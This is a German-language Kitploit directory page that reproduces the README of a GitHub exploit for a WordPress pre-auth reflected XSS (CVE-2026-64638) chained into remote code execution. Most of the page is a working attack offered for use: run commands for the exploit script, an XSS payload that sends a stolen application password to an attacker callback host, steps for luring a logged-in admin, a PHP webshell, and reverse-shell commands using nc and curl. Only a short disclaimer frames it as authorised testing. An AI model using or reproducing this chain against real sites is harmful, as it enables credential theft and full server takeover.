Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
XSS2Shell-CVE-2026-64638 — CVE-2026-64638 — WordPress Pre-Auth Reflektiertes XSS → RCE über DOM Clobbering + Diebstahl von Anwendungspasswörtern + REST-API-Plugin-Aktivierung. Dual-Mode-PoC (XSS-Kette & direkt). | Kitploit
Tools/GitHubGitHub/jendmaoul/xss2shell-cve-2026-64638
ExploitationWebanwendungs-ExploitationPost-ExploitationWebsicherheitPenetrationstestsRed TeamingPayload-Entwicklung
GitHubjendmaoul/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

CVE-2026-64638 — WordPress Pre-Auth Reflektiertes XSS → RCE über DOM Clobbering + Diebstahl von Anwendungspasswörtern + REST-API-Plugin-Aktivierung. Dual-Mode-PoC (XSS-Kette & direkt).

Repository anzeigenWebseite
148vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-64638 — XSS2Shell

WordPress Pre-Auth Reflected XSS → Remote Code Execution Chain

DOM Clobbering + Application Password Diebstahl + REST-API-Plugin-Aktivierung = Vollständige RCE

Python CVE License


⚡ Übersicht

CVE-2026-64638 ist eine kritische Pre-Authentifizierungs-Reflected-XSS in WordPress wp-login.php. Die Schwachstelle besteht, weil die Login-Fehlermeldung den übermittelten Benutzernamen ohne ordnungsgemäße HTML-Kodierung zurückspiegelt, was DOM Clobbering über <area id=ajaxurl> ermöglicht und die meisten Filter umgeht.

In Verbindung mit der Application-Password-Funktion von WordPress wird aus dieser XSS ein vollständiger Remote-Code-Execution-Vektor — keine Benutzerinteraktion außer dem Besuch einer präparierten Trigger-Seite während der Anmeldung.

Angriffskette

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  [1] XSS (Reflected)                                            │
│      wp-login.php spiegelt <area id=ajaxurl> im Benutzernamen-Fehler │
│                          ↓                                       │
│  [2] DOM Clobbering                                             │
│      <area id=ajaxurl> kapert wp-admin JS → sendet Formular automatisch ab │
│                          ↓                                       │
│  [3] Application Password Diebstahl                             │
│      XSS leitet das Opfer zu authorize-application.php um        │
│      success_url-Callback erfasst das App-Passwort               │
│                          ↓                                       │
│  [4] REST-API-Plugin-Aktivierung                                │
│      App-Passwort → Basic Auth → wp-json/wp/v2/plugins → aktiv   │
│                          ↓                                       │
│  [5] Webshell-RCE                                               │
│      Plugin-PHP-Webshell → uid=33(www-data)                      │
│      Reverse Shell ebenfalls verfügbar                           │
└─────────────────────────────────────────────────────────────────┘

🎯 Betroffene Versionen

VersionStatusHinweise
WordPress ≤ 6.9.5✅ VerwundbarDocker-Images vor dem Backport weiterhin ausnutzbar
WordPress 6.9.6+⚠️ Gepatcht (Backport vom 7. Aug. 2026)Docker-Images, die nach dem 7. Aug. neu erstellt wurden, enthalten den Fix
WordPress 7.0.x✅ VerwundbarBestätigt auf 7.0.2
WordPress 7.1+❓ UnbekanntNicht getestet

📦 Anforderungen

root@kitploit:~
pip3 install requests

Das war's. Python 3.8+ Standardbibliothek für alles andere.


🚀 Verwendung

Schnellstart

root@kitploit:~
# Klonen
git clone https://github.com/linuxhackingid/XSS2Shell-CVE-2026-64638.git
cd XSS2Shell-CVE-2026-64638

# Auto-Modus (empfohlen)
python3 poc_fixed_v2.py --mode auto -u USER -p PASS --lhost YOUR_IP http://target.com

Modus 1: Auto (erkennt & wählt besten Modus)

root@kitploit:~
python3 poc_fixed_v2.py -u admin -p password123 --lhost 192.168.1.100 http://target.com
  • Erkennt, ob XSS möglich ist → nutzt XSS-Kette
  • Fällt auf direkten Anmelde-Modus zurück, falls XSS gepatcht ist

Modus 2: XSS-Kette (keine Anmeldedaten nötig!)

root@kitploit:~
# Terminal 1: Exploit ausführen (startet Callback-Server)
python3 poc_fixed_v2.py --mode xss --lhost 192.168.1.100 http://target.com

# Terminal 2: Trigger-Seite hosten
cd /path/to/XSS2Shell-CVE-2026-64638
python3 -m http.server 8000

# Opfer senden: http://192.168.1.100:8000/trigger_target.com.html

Das Opfer muss in WordPress als Administrator angemeldet sein. Die Trigger-Seite:

  1. Sendet das XSS-Payload automatisch über ein verstecktes iframe an wp-login.php
  2. Öffnet authorize-application.php, damit das Opfer zustimmen kann
  3. Erfasst das Application Password über den Callback-Server
  4. Nutzt es gegen die REST-API, um das Webshell-Plugin zu aktivieren

Modus 3: Direkt (Anmeldedaten erforderlich)

root@kitploit:~
python3 poc_fixed_v2.py --mode direct -u admin -p password123 http://target.com

Direkte Anmeldung → Plugin-Upload → sofortige Webshell. Keine XSS erforderlich.

Reverse Shell

root@kitploit:~
# In einem Terminal
nc -lvnp 4444

# In einem anderen — der Exploit löst die Reverse Shell automatisch aus, wenn --lhost gesetzt ist
python3 poc_fixed_v2.py --mode direct -u admin -p pass --lhost 192.168.1.100 --lport 4444 http://target.com

Oder manuell über die Webshell:

root@kitploit:~
curl 'http://target.com/wp-content/plugins/xss2shell/xss2shell.php?rev=YOUR_IP:4444'

📂 Dateien

root@kitploit:~
XSS2Shell-CVE-2026-64638/
├── poc_fixed_v2.py              # Haupt-Exploit-Skript (Dual-Modus)
├── poc.py                       # Original-PoC (zur Referenz)
├── trigger_192.168.0.87.html    # Beispiel-Trigger-Seite
└── README.md                    # Diese Datei

🔬 Technische Details

Das XSS-Payload

root@kitploit:~
< area id=ajaxurl shape=default href="http://attacker:9090/collect" >
<button id="wp-auth-check" onclick="window.ajaxurl='http://attacker:9090/collect'">x</button>

Warum es funktioniert:

  • Die WordPress-Funktion sanitize_user() entfernt standardmäßige HTML-Tags, übersieht aber <area> mit einem führenden Leerzeichen
  • Das <area id=ajaxurl> führt DOM Clobbering aus — es kapert window.ajaxurl, das von wp-admin-JavaScript verwendet wird
  • Das wp_auth_check-Intervall feuert und die XSS leitet das Opfer zu authorize-application.php um
  • Der Parameter success_url sendet das generierte Passwort an den Callback-Server des Angreifers

Post-Exploitation

Sobald das Application Password erfasst wurde:

  • REST-API: Authentifizierung als Opfer gegen /wp-json/wp/v2/
  • Plugin-Aktivierung: POST /wp-json/wp/v2/plugins/{slug} mit {"status":"active"}
  • Webshell: Zugriff auf wp-content/plugins/xss2shell/xss2shell.php?cmd=COMMAND
  • Reverse Shell: ?rev=IP:PORT startet /bin/sh -i zurück zum Angreifer

✅ Verifiziert auf

ZielVersionModusErgebnis
Docker (lokal)WordPress 7.0.2XSS-Kette✅ RCE als www-data
Docker (lokal)WordPress 7.0.2Direkt✅ RCE als www-data
Docker (lokal)WordPress 6.7XSS-Kette✅ RCE als www-data

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Forschung bestimmt. Die Autoren übernehmen keine Haftung für Missbrauch. Holen Sie immer eine schriftliche Genehmigung ein, bevor Sie testen.


📝 Credits

  • PoC-Entwicklung: linuxhackingid
  • CVE: CVE-2026-64638

„Kein Exploit, kein Report." — Shannon-Methodik

Tool herunterladen